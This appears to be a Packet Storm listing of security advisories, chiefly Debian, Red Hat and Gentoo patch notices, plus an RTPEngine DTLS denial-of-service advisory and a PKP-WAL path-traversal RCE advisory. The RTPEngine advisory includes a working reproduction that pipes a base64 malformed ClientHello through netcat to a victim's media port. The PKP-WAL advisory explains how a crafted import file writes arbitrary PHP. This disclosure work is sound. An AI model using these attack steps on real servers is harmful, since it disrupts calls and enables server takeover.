I2P is an anonymizing network, offering a simple layer that identity-sensitive applications can use to securely communicate. All data is wrapped with several layers of encryption, and the network is both distributed and dynamic, with no trusted parties. This is the source code release version.

I2P 2.4.0

Debian Linux Security Advisory 5580-1 - The Zoom Offensive Security Team discovered that processing a SVG image may lead to a denial-of-service.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5580-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
December 18, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2023-42883

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2023-42883

    The Zoom Offensive Security Team discovered that processing a SVG  
    image may lead to a denial-of-service.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 2.42.4-1~deb11u1.

For the stable distribution (bookworm), this problem has been fixed in  
version 2.42.4-1~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmWAmlsACgkQAAyEYu0C  
2AKE4A/+K1bfikREQtpbuNTEDrurBYkeeCHK3hVTbj3s+x9E2LXfPDhgGMq42a5y  
Mfy8+cKeSXAFrWUEOCcJ73Ws05xNJamNclzfDiQGxJlSRombZXM1XROtyvFy3gUc  
nwWANsA8mPMfK22cZ7M/jQglyHlxIVQSbI18qDSxAN7Golo3bvve8zgtTL9phbLK  
qaGC0jw4r3BbQNnQxwJJiSi4B+JdNIalWYuiRZQGoZqTrpqY9fFbpmP1N2JP32fN  
rCPbFMN2YoLTdfALTmLKp4Hd88QdjFMj+DS7+0Lp1J40z3mfOODJIlybUcMKlbI8  
VWAZx3uhQxylzC9iWFkA99Igfc9mQdlvpOHMOgRaSYkeI3Ymp9im/GCn7/MylwhL  
BKmQS08+1s0qI8st8+rGwkCiCJdeA8pZonjvXGhsSYFWtODrFUwGwf+F1AbzaMOy  
ylwC2IawL13g8ruVlCwRtyKZctyGLYmOzjka2uq6AkIzMmaPujVwh9uYVv5iW/UX  
PedPlod5TacMnanjNLQDG+ZiEaHU/2P3kxRwW3nMmnS/H+3wYkPMOIqXDwTxw5kv  
woaTc8zCJHcHZ90HfRjKsZqlrTORjeleTPrdKWvjCyoyMkWDftOuLYh/YXek0Etr  
Cud+gmpHgK6BS5pRd/Ctx1P9a+DEQelau61m/Kib4QPTXRa8/K4=  
=afkP  
-----END PGP SIGNATURE-----

Debian Security Advisory 5580-1

Red Hat Security Advisory 2023-7878-03 - An update for the postgresql:10 module is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include an integer overflow vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7878.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: postgresql:10 security updateAdvisory ID:        RHSA-2023:7878-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7878Issue date:         2023-12-19Revision:           03CVE Names:          CVE-2023-5869====================================================================Summary: An update for the postgresql:10 module is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: Buffer overrun from integer overflow in array modification (CVE-2023-5869)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5869References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2247169

Red Hat Security Advisory 2023-7878-03

Gentoo Linux Security Advisory 202312-1 - Several vulnerabilities have been found in Leptonice, the worst of which could lead to arbitrary code execution. Versions greater than or equal to 1.81.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-01  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Leptonica: Multiple Vulnerabilities  
     Date: December 18, 2023  
     Bugs: #649752, #869416  
       ID: 202312-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Several vulnerabilities have been found in Leptonice, the worst of which  
could lead to arbitrary code execution.

Background  
==========

Leptonica is a C library for image processing and analysis.

Affected packages  
=================

Package               Vulnerable    Unaffected  
--------------------  ------------  ------------  
media-libs/leptonica  < 1.81.0      >= 1.81.0

Description  
===========

Multiple vulnerabilities have been discovered in Leptonica. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Leptonica users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/leptonica-1.81.0"

References  
==========

[ 1 ] CVE-2017-18196  
      https://nvd.nist.gov/vuln/detail/CVE-2017-18196  
[ 2 ] CVE-2018-7186  
      https://nvd.nist.gov/vuln/detail/CVE-2018-7186  
[ 3 ] CVE-2018-7247  
      https://nvd.nist.gov/vuln/detail/CVE-2018-7247  
[ 4 ] CVE-2018-7440  
      https://nvd.nist.gov/vuln/detail/CVE-2018-7440  
[ 5 ] CVE-2018-7441  
      https://nvd.nist.gov/vuln/detail/CVE-2018-7441  
[ 6 ] CVE-2018-7442  
      https://nvd.nist.gov/vuln/detail/CVE-2018-7442  
[ 7 ] CVE-2022-38266  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38266

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-01

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-01

Debian Linux Security Advisory 5579-1 - Multiple vulnerabilities were discovered in FreeImage, a support library for graphics image formats, which could result in the execution of arbitrary code if malformed image files are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5579-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffDecember 17, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : freeimageCVE ID         : CVE-2020-21427 CVE-2020-21428 CVE-2020-22524Multiple vulnerabilities were discovered in FreeImage, a support libraryfor graphics image formats, which could result in the execution ofarbitrary code if malformed image files are processed.For the oldstable distribution (bullseye), these problems have been fixedin version 3.18.0+ds2-6+deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 3.18.0+ds2-9+deb12u1.We recommend that you upgrade your freeimage packages.For the detailed security status of freeimage please refer toits security tracker page at:https://security-tracker.debian.org/tracker/freeimageFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmV/P8AACgkQEMKTtsN8TjZOgw//e8Bv/IaGizwfZv1pgt7WltqB7B/CcwaP4S1ARybOAEShsVvMUojq3oocT8xG37LWJ6POh1w9Ks8mEtmhAcyap0L7oO+xUyBsvIy1Wqa+XK26AVeAtbSNyyr8jIzfD/5B0cT8mhs7d3t1EhuLucB5n3VL2KWU3INRuo0Az7rBxrQO5lzT46dBJueJDX4f5jIEVEbxvLCkox/COz0eQW2S0m+ry6qKnVf8F7lBBMEZQVzQrHI3sV5Eo9vKPGIBlQmf05qm04utwbOxKWCU3Aq+3aVt+5DJ62oGPBS/aLjsi3pN2wSay3kE/xV/CUyV4N5R9NYPFqyPBC8gPgwDg1gOvIEFP1nXKpxWK+JtLRpZDg4Gl5Wmo9aE9Qinw7ajxY/MbtL+U0QsfqL2TKnZs0yVineV6aUffSZ6r64BK2FEVN5ZoRM4G59++8iE45xX2QxM8DklmYc3Utyo2nmmckJNfwRnevTxesDHjxSUPMQe/gGtpFSiXmHK6LoQFxcv5+p8LS6JcRQINNXtcyHnRJt2jFsOKWZ5C84iNSy9tN+wtvR4dIOOSuGcxkmyDeIjFOMKXeYxqfqurWC0ipXJ39agh0Co4kqUXtPClpGg++/zVKZ3fNW6sQ/NVYKmEj2YPY/39EWV894huQiXRkzpykOWIa/54Knpxz60FBID3s/7gU4==zfhY-----END PGP SIGNATURE-----

Debian Security Advisory 5579-1

Debian Linux Security Advisory 5576-2 - The initial fix for CVE-2023-6377 as applied in DSA 5576-1 did not fully fix the vulnerability. Updated packages correcting this issue including the upstream merged commit are now available.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5576-2                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
December 17, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : xorg-server  
CVE ID         : CVE-2023-6377

The initial fix for CVE-2023-6377 as applied in DSA 5576-1 did not fully  
fix the vulnerability. Updated packages correcting this issue including  
the upstream merged commit are now available.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 2:1.20.11-1+deb11u10.

For the stable distribution (bookworm), this problem has been fixed in  
version 2:21.1.7-3+deb12u4.

We recommend that you upgrade your xorg-server packages.

For the detailed security status of xorg-server please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/xorg-server

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmV+8INfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0RTSRAAmuUhWkJzbFNJZzIZxvPxX4grTvBw5TlvOs9VovPtHWmlvnqzIvA3Q47Z  
6asqdnWqTgEamK3Bgb/+s6qOzqK4G8cRtP1dq1dvg/OimwKRY96x/Z6+aySW4UEC  
SPDroT7AXAEMPzYMbgsZh+SIfQLtevEKf0SiuFpF3/e5qWajpZspn+/1o/WEGvxY  
CqjX+fOrXTWaR17faUiV8fCyZn0ApXv/XSnimgSXniYiK8tmXWNMbl4lyhP1XTuc  
NP3wNU0NFmsOXJNtxqpz/IQUvS/OzkNye9v9s/usmigLBlVo7J0wwM7r2d/BMVpt  
PiwBgo6vFf67l53X7iSG6OkMWUazmO5K9xEGuOdHsmKkZg96V7mJPyuSfsk8vXrN  
aXsHBXk4EwbYFcGXpH8l62GJ5QwzhYnlwIvmGh+DuQbrI6bk/wOdTVe99PbduGm8  
tftGQFryg9Uy5KHyegMl9zR7jT/KkE/hGEB9KCwyWVPYmUxAEo5WMRL0YFMH2R4n  
4luimBbgLMTi7yWmkG7TLgfedPOvW6cJxs5Qnft0DH0q1sJVYinZ0nvfdCPROF2N  
+t2Ko/oDHSyD+ylX9h4VVKoI505cqvdn1mzGXRa8O7d0nyA0O5OPF+2MJPTlvn1d  
qmcbU1om+fKAdZdSIkHF4cZ3yymmQYoc0udUJk1q2csLOivks2A=  
=pTcv  
-----END PGP SIGNATURE-----

Debian Security Advisory 5576-2

Debian Linux Security Advisory 5578-1 - It was discovered that Ghostscript, the GPL PostScript/PDF interpreter, does not properly handle errors in the gdev_prn_open_printer_seekable() function, which could result in the execution of arbitrary commands if malformed document files are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5578-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoDecember 15, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ghostscriptCVE ID         : CVE-2023-46751It was discovered that Ghostscript, the GPL PostScript/PDF interpreter,does not properly handle errors in the gdev_prn_open_printer_seekable()function, which could result in the execution of arbitrary commands ifmalformed document files are processed.For the stable distribution (bookworm), this problem has been fixed inversion 10.0.0~dfsg-11+deb12u3.We recommend that you upgrade your ghostscript packages.For the detailed security status of ghostscript please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/ghostscriptFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmV8yaFfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0TAJg//dwWvcufMw6RfXljQUkeYvT0LHK8QqRPD7Hv64h+OYGV3O5ptm6vMsWQN2PEhtrkfQdl7zSugPHcBb0w2M7ZhzwvtbTgVCy0ljnLqucH1H5sE6MEy81hy2UXHc6Cu67h5pbvTaqFE+NhtLpd3ewAhTjTYvIKewm5izrk4XYIr9pzsNWGJACZoX2Pd5qgCdmkPLm8yCBsZp8J5zNxRNr1z9SWp61o6QWkvdaUGRvUe83/5hn3nS+14dgA/0W/3REra8w5kr6tzYdqd2Xwwr/fYYC091XdPejykI/Bv/nxBc6+B+cI8vw+kpqgmptspuN7LbrjkdQ8ovz1xoDQyyhWt/gVLraNP5Hy/KvX89XF/C+HEeUPDELGJkLMiAIsLzz7NkJ/iOPAiQNk9Qr0/k+Vz9ThTKrFRTCu1CaHOuTB2dzrYfXpJCBktzls7t1fsDgGlDabR3fYX5WhvRABTFn2yxSl1KVcKfnRZvF3z2kSoQlj9Jqb/IrVdNm4N21w+2C52fZAHqVv5ccTE7OncKXddevvPXacq8eZuOTSJJAuhgxqIQyetfYABOdEWeIPxc/lvfvaD+O8jDxXQR2Xs9Gf3dMgk9BZCUMkPsK02JXJIfq7rCjk5pnHacv7lWS14r23/EPPXhEn9Sb78Jvn4YrDF1hC1fPiBVulZteMWiRhEWNQ==Vah7-----END PGP SIGNATURE-----

Debian Security Advisory 5578-1

RTPEngine version mr11.5.1.6 suffers from a denial of service vulnerability via DTLS Hello packets during call initiation.

# RTPEngine susceptible to Denial of Service via DTLS Hello packets during call initiation

- Fixed versions: mr12.1.1.2, mr12.0.1.3, mr11.5.1.16, mr10.5.6.3, mr10.5.6.2  
- Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2023-03-rtpengine-dtls-hello-race  
- Vendor Patch: https://github.com/sipwise/rtpengine/commit/e969a79428ac4a15cdf1c0a1c6f266dbdc7e60b6  
- Tested vulnerable versions: mr11.5.1.6  
- Timeline:  
  - Report date: 2023-10-02  
  - Triaged: 2023-10-02  
  - Fix provided for testing: 2023-11-16  
  - Enable Security verified fix: 2023-12-14  
  - Vendor release with fix: 2023-12-14  
  - Enable Security advisory: 2023-12-15

## TL;DR

When handling DTLS-SRTP for media setup, RTPEngine is susceptible to Denial of Service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS encrypted calls during the attack.

## Description

Our research has shown that key establishment for Secure Real-time Transport Protocol (SRTP) using Datagram Transport Layer Security Extension (DTLS)[^1] is susceptible to a Denial of Service attack due to a race condition. If an attacker manages to send a ClientHello DTLS message with an invalid CipherSuite (such as `TLS_NULL_WITH_NULL_NULL`) to the port on the RTPEngine server that is expecting packets from the caller, the media session is torn down.

This behavior was tested against RTPEngine version mr11.5.1.6, which was found to be vulnerable to this issue.

The following sequence diagram shows the normal flow (i.e. no attack) involving SIP, STUN and DTLS messages between a UAC (the Caller), Kamailio and an RTPEngine server capable of handling WebRTC calls.

Diagram showing a call setup against RTPEngine that uses SIP, STUN and DTLS:  
https://github.com/EnableSecurity/advisories/raw/master/ES2023-03-rtpengine-dtls-hello-race/resources/valid.png

In a controlled experiment, it was observed that when the Attacker sent a DTLS ClientHello to RTPEngine's media port from a different IP and port, RTPEngine gave an internal error and did not process the call any longer.

Diagram showing a call setup against RTPEngine that fails due to an attacker controlled DTLS ClientHello:  
https://github.com/EnableSecurity/advisories/raw/master/ES2023-03-rtpengine-dtls-hello-race/resources/dos.png

During a real attack, the attacker would spray a vulnerable RTPEngine server with DTLS ClientHello messages. The attacker would typically target the range of UDP ports allocated for RTP. When the ClientHello message from the Attacker wins the race against an expected ClientHello from the Caller, RTPEngine terminates the media session resulting in Denial of Service.

The following log shows that RTPEngine resets the DTLS connection context:

```  
DEBUG: [... port 39910]: [ice] Received ICE/STUN response code 0 for candidate pair TUk2hmDhRdEwbjA1:6249488300:1 from 192.168.1.202:56083 to 192.168.1.202  
DEBUG: [... port 39910]: [ice] Setting ICE candidate pair TUk2hmDhRdEwbjA1:6249488300:1 as succeeded  
DEBUG: [... port 39910]: [ice] Best succeeded ICE pair with all components is TUk2hmDhRdEwbjA1:6249488300:1  
DEBUG: [... port 39910]: [ice] ICE not completed yet, but can use pair TUk2hmDhRdEwbjA1:6249488300:1  
INFO: [... port 39910]: [ice] ICE negotiated: peer for component 1 is 192.168.1.202:56083  
INFO: [... port 39910]: [ice] ICE negotiated: local interface 192.168.1.202  
DEBUG: [... port 39910]: [srtp] Processing incoming DTLS packet  
ERR: [... port 39910]: [crypto] DTLS error: 1 (no shared cipher)  
ERR: [... port 39910]: [srtp] DTLS error on local port 39910  
DEBUG: [... port 39910]: [crypto] Resetting DTLS connection context  
```

## Impact

Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable RTPEngine servers for calls that rely on DTLS-SRTP. In practice, this results in all new calls appearing to be on mute.

## How to reproduce the issue

1. Run an RTPEngine instance with the following command:

    ```bash  
  rtpengine -f \  
    --interface=<interface> \  
    --listen-ng="<listen-ng>" \  
    --pidfile=<pidfile> \  
    --port-min=35000 \  
    --port-max=40000 \  
    --log-stderr \  
    --log-level=10  
  ```  
1. Run a Kamailio instance with the following configuration:

  ```bash  
  debug=2  
  log_stderror=yes

  memdbg=5  
  memlog=5

  log_facility=LOG_LOCAL0

  loadmodule "pv.so"  
  loadmodule "xlog.so"  
  loadmodule "rtpengine.so"  
  loadmodule "sl.so"  
  loadmodule "tm.so"  
  loadmodule "textops.so"  
  loadmodule "siputils.so"

  modparam("rtpengine", "rtpengine_sock", "udp:<listen-ng>")

  alias="<alias>"

  request_route {  
    xlog("L_INFO","$su\n");

    if ($rm == "INVITE") {  
      $avp(caller_source)="$si:$sp";  
    }

    if ($avp(caller_source) == "$si:$sp") {  
      if ($rm == "INVITE") {  
        rewritehostport("192.168.1.202:9999");  
        rtpengine_manage("replace-origin replace-session-connection pad-crypto RTP/SAVPF ICE=force");

        t_relay();  
      }  
      break;  
    } else {  
      xlog("L_INFO","got a request from callee [$rm]\n");  
      break;  
    }  
  }

  onreply_route{  
    if ($avp(caller_source) != "$si:$sp") {  
      if (!is_request()) {  
        xlog("L_INFO","got a reply from callee [$rs $rr]\n");  
        if has_body("application/sdp") {  
          rtpengine_manage("replace-origin replace-session-connection pad-crypto RTP/SAVPF ICE=force");  
        }  
      }  
      exit;  
    }  
  }  
   ```

1. Send an INVITE message to Kamailio with WebRTC SDP:

    ```default  
  INVITE sip:1000@192.168.1.202 SIP/2.0  
  Via: SIP/2.0/WSS 192.168.1.202:36742;rport=36742;branch=z9hG4bK-jQcnXJadB2VGfGmQ  
  Max-Forwards: 70  
  From: <sip:1000@192.168.1.202>;tag=L9kc5NfpYG1u67cT  
  To: <sip:1000@192.168.1.202>  
  Contact: <sip:1000@192.168.1.202>  
  Call-ID: DzGnBLt0z9SK3MC0  
  CSeq: 5 INVITE  
  Content-Type: application/sdp  
  Content-Length: 385

  v=0  
  o=- 1695296331 1695296331 IN IP4 192.168.1.202  
  s=-  
  t=0 0  
  c=IN IP4 192.168.1.202  
  m=audio 45825 UDP/TLS/RTP/SAVPF 0 8 101  
  a=setup:active  
  a=fingerprint:sha-256 49:05:98:B2:15:43:1C:9C:4F:29:07:60:F8:63:77:16:80:F9:44:C0:97:8E:E5:48:D6:71:B4:03:10:85:D6:E3  
  a=rtpmap:0 PCMU/8000/1  
  a=rtpmap:8 PCMA/8000/1  
  a=rtpmap:101 telephone-event/8000  
  a=rtcp-mux  
  a=rtcprsize  
  a=sendrecv  
  ```  
1. Note RTPEngine's media port and IP values, which will be used as the `<rtpengine-ip>` and `<media-port>` parameters by the Attacker  
1. Send a DTLS ClientHello message from a (attacker-controlled) host, which is different from the Caller but has network access to the RTPEngine server

    ```bash  
  CLIENT_HELLO="Fv7/AAAAAAAAAAAAfAEAAHAAAAAAAAAAcP79AAA"   
  CLIENT_HELLO="${CLIENT_HELLO}AAG4HCVaUNVbYVmxuqdn2WyCgtTijhZ+WheP/+H"  
  CLIENT_HELLO="${CLIENT_HELLO}4AAAACAAABAABEABcAAP8BAAEAAAoACAAGAB0AF"  
  CLIENT_HELLO="${CLIENT_HELLO}wAYAAsAAgEAACMAAAANABQAEgQDCAQEAQUDCAUF"  
  CLIENT_HELLO="${CLIENT_HELLO}AQgGBgECAQAOAAkABgABAAgABwA="  
  echo -n "${CLIENT_HELLO}" | base64 --decode | nc -u <rtpengine-ip> <media-port>  
  ```  
1. Observe that RTPEngine reports that the DTLS context has been reset

## Solution and recommendations

To address this vulnerability, upgrade RTPEngine to the latest version which includes the security fix. The solution implemented is to drop all packets from addresses that have not been validated by an ICE check.

## About Enable Security

[Enable Security](https://www.enablesecurity.com) develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack.

## Disclaimer

The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

## Disclosure policy

This report is subject to Enable Security's vulnerability disclosure policy which can be found at <https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy>.

[^1]: Datagram Transport Layer Security (DTLS) Extension to Establish Keys for the Secure Real-time Transport Protocol (SRTP) https://datatracker.ietf.org/doc/html/rfc5764

--

     Sandro Gauci, CEO at Enable Security GmbH

    Register of Companies:       AG Charlottenburg HRB 173016 B  
    Company HQ:                       Neuburger Straße 101 b, 94036 Passau, Germany  
    RTCSec Newsletter:               https://www.rtcsec.com/subscribe  
    Our blog:                                https://www.rtcsec.com  
    Other points of contact:       https://www.enablesecurity.com/contact/

RTPEngine mr11.5.1.6 Denial Of Service

PKP Web Application Library (PKP-WAL) versions 3.4.0-3 and below, as used in Open Journal Systems (OJS), Open Monograph Press (OMP), and Open Preprint Systems (OPS) before versions 3.4.0-4 or 3.3.0-16, suffer from a NativeImportExportPlugin related remote code execution vulnerability.

    ---------------------------------------------------------------------------------PKP-WAL <= 3.4.0-3 (NativeImportExportPlugin) Remote Code ExecutionVulnerability---------------------------------------------------------------------------------[-] Software Links:https://pkp.sfu.cahttps://github.com/pkp/pkp-lib[-] Affected Versions:PKP Web Application Library (aka PKP-WAL or pkp-lib) version 3.4.0-3and prior versions, as used in Open Journal Systems (OJS), OpenMonograph Press (OMP), and Open Preprint Systems (OPS) before versions3.4.0-4 or 3.3.0-16.[-] Vulnerabilities Description:The vulnerability is located in the/plugins/importexport/native/filter/PKPNativeFilterHelper.php script.Specifically, into the"PKPNativeFilterHelper::parsePublicationCover()" method:100.     public function parsePublicationCover($filter, $node, $object)101.     {102.         $deployment = $filter->getDeployment();103.104.         $context = $deployment->getContext();105.106.         $locale = $node->getAttribute('locale');107.         if (empty($locale)) {108.             $locale = $context->getPrimaryLocale();109.         }110.111.         $coverImagelocale = [];112.         $coverImage = [];113.114.         for ($n = $node->firstChild; $n !== null; $n = $n->nextSibling) {115.             if ($n instanceof DOMElement) {116.                 switch ($n->tagName) {117.                     case 'cover_image':118.                         $coverImage['uploadName'] = $n->textContent;119.                         break;120.                     case 'cover_image_alt_text':121.                         $coverImage['altText'] = $n->textContent;122.                         break;123.                     case 'embed':124.                         $publicFileManager = new PublicFileManager();125.                         $filePath =$publicFileManager->getContextFilesPath($context->getId()) . '/' .$coverImage['uploadName'];126.                         file_put_contents($filePath,base64_decode($n->textContent));127.                         break;User input passed through the cover image tags of the import XML fileis not properly sanitized before being used at line 118 to construct avariable, which is later used as the final part of the filepath usedin a call to the file_put_contents() PHP function at line 126. Thiscan be exploited to write/overwrite arbitrary files on the web servervia Path Traversal sequences, leading to execution of arbitrary PHPcode.Successful exploitation of this vulnerability requires an account withpermissions to access the "Import/Export" plugin, such as a JournalEditor or Production Editor user.[-] Solution:Upgrade to version 3.4.0-4 or later.[-] Disclosure Timeline:[14/10/2023] - Vendor notified[26/10/2023] - Vendor fixed the issue and opened a public GitHubissue: https://github.com/pkp/pkp-lib/issues/9464[05/11/2023] - CVE identifier assigned[17/11/2023] - Version 3.4.0-4 released[14/12/2023] - Publication of this advisory[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the name CVE-2023-47271 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Original Advisory:http://karmainsecurity.com/KIS-2023-14

PKP-WAL 3.4.0-3 Remote Code Execution

Google's American Fuzzy Lop is a brute-force fuzzer coupled with an exceedingly simple but rock-solid instrumentation-guided genetic algorithm. afl++ is a superior fork to Google's afl. It has more speed, more and better mutations, more and better instrumentation, custom module support, etc.

Source

Packet Storm